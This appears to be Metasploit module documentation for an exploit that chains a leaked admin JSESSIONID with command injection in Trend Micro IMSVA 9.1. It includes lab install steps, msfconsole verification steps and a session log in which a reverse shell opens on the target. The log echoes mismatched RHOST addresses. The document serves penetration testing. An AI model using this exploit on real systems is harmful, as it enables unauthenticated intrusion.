## Vulnerable Application
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

**Vulnerable Application Installation Steps**

IMSVA is distrubed as an ISO image by Trend Micro.

Following steps are valid on the CentOS 6 x64 bit operating system.

1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
4. Click to the download button and complete installation of ISO.

If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.

[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)

**System requirements:**
- Virtualbox or VMware can be used. 
- 4 GB of memory at least.
- 120 GB of disk size at least.

## Verification Steps

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
- [ ] **Verify** that you are getting `Session with widget framework successfully initiated` session.

## Scenarios

```
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_imsva_widget_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_imsva_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Triggering command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300

pwd
/opt/trend/imss/UI/adminUI/ROOT/widget

```